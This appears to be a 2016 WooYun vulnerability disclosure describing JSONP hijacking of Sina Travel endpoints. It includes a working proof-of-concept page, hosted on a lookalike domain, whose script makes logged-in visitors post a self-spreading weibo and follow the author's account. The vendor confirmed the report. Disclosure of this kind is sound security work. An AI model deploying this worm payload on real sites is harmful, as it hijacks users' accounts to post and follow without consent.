当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171499

漏洞标题:新浪微博JSONP劫持之点我链接开始微博蠕虫+刷粉丝

相关厂商:新浪

漏洞作者: zhchbin

提交时间:2016-01-20 22:34

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-31: 细节向核心白帽子及相关领域专家公开
2016-02-10: 细节向普通白帽子公开
2016-02-20: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

JSONP劫持,域名是sina.com.cn的子域,就报给新浪吧。放了快一个月,再不发我怕我控制不住真的去玩蠕虫,刷粉丝了。

详细说明:

0x01 发微博
在新浪旅游的攻略页面中有个提问的功能,提示“此问题会同步到你的新浪微博”。

http://travel.sina.com.cn/fj_sanming_685-xiangqing-gonglue/


20160119000615.png


具体接口如下:

http://u.travel.sina.com.cn/api-i/qa/sendweibo?content=asdf1&callback=jQuery17206884582478087395_1452354554166&_=1452354673975


这个接口是JSONP的形式,有检查referer,但是不严格,可以轻松绕过,可以绕过的referer例子:

http://travel.sina.com.cn.zhchbin.xyz/


0x02 关注
有些攻略页面会嵌入一些旅行网的微博,上面有关注功能,比如:

http://travel.sina.com.cn/aolanduo_2998-xiangqing-gonglue/


具体接口如下:

http://data.travel.sina.com.cn/award/friendships.php?uid=1684037597&times=1453205469390&callback=jQuery172005376373999752104_1453205445886&_=1453205469391


这个接口也是JSONP,没有任何检查,直接劫持即可。
通过这两个接口,我就可以成为网红了应该,劫持发微博蠕虫,同时刷粉丝!

漏洞证明:

登录微博,点我链接:

http://travel.sina.com.cn.zhchbin.xyz/travel_jsonp.html


测试代码:

<script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.4/jquery.js"></script>
<script>
$(function() {
  var sendweibo = 'http://u.travel.sina.com.cn/api-i/qa/sendweibo?'
  var content = "这里有好东西,赶紧看,你懂得!http://travel.sina.com.cn.zhchbin.xyz/travel_jsonp.html"
  sendweibo = sendweibo + 'content=' + content + '&_=' + Date.now();
  $.ajax({
    url: sendweibo,
    jsonp: "callback",
    dataType: "jsonp",
    success: function(response) {
      console.log(response);
    }
  });
  var follow_me = 'http://data.travel.sina.com.cn/award/friendships.php?uid=1904533355&times=' + Date.now();
  $.ajax({
    url: follow_me,
    jsonp: "callback",
    dataType: "jsonp",
    success: function(response) {
      console.log(response);
    }
  });
});
</script>

修复方案:

修复JSONP劫持
欢迎关注我微博!!http://weibo.com/zhchbin

版权声明:转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-21 10:03

厂商回复:

感谢支持,漏洞修复中

最新状态:

暂无